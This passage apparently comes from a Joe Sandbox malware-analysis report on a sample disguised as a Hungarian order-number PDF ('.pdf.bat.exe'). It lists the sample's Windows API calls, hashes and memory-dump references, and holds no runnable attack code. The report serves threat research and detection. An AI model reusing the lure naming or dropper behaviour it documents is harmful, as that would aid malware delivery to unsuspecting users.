                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID:
                                              • API String ID: 3248276644-0
                                              • Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                              • Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
                                              • Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                              • Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE
                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                              • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                              • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                              • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                              Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                              • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                              • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                              • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D
                                              Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                              • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                              • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                              • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                              Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                              Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                              • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                              • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                              Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FilePointerwsprintf
                                              • String ID:
                                              • API String ID: 327478801-0
                                              • Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                              • Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
                                              • Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                              • Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E
                                              Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringWrite
                                              • String ID:
                                              • API String ID: 390214022-0
                                              • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                              • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                              • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                              Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                              • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                              Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                              • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                              Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                              • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                              Function 6FBC2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNELBASE(6FBC405C,00000004,00000040,6FBC404C), ref: 6FBC29B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                              • Instruction ID: 1566f7b81081c6dbb248daf258cd4eb0617e8a8fc4bce13e0bd4d7959dcb6f54
                                              • Opcode Fuzzy Hash: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                              • Instruction Fuzzy Hash: 89F0A5B1588A80DFCB50CF6A94447073BF0F74E324B0349AAE1A9D7240E3744266DB1A
                                              Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                              • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                              Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                              • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                              • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                              • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                              Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
